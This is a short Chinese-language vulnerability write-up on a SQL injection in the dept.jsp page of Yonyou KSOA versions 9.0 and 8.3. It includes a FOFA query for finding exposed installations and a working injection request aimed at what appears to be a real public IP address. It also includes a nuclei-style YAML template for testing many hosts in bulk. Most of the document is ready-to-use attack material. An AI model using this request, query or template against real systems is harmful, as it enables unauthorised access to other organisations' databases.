漏洞简介
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
系统dept.jsp文件中参数存在SQL注入漏洞
影响版本
用友时空 KSOA v9.0 v8.3
漏洞复现
fofa语法:app="用友-时空KSOA"
登录页面如下:
POC:
GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
Host: 101.75.85.36:8098
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
批量yaml文件
id: yonyou_KOSA_dept_sqli
info:
name: 用友时空KSOA dept.jsp SQL注入漏洞
author: mhb17
severity: info
description: description
reference:
- https://
tags: sqli
requests:
- raw:
- |+
GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- '827ccb0eea8a706c4c34a16891f84e7'
- type: word
part: header
words:
- '200'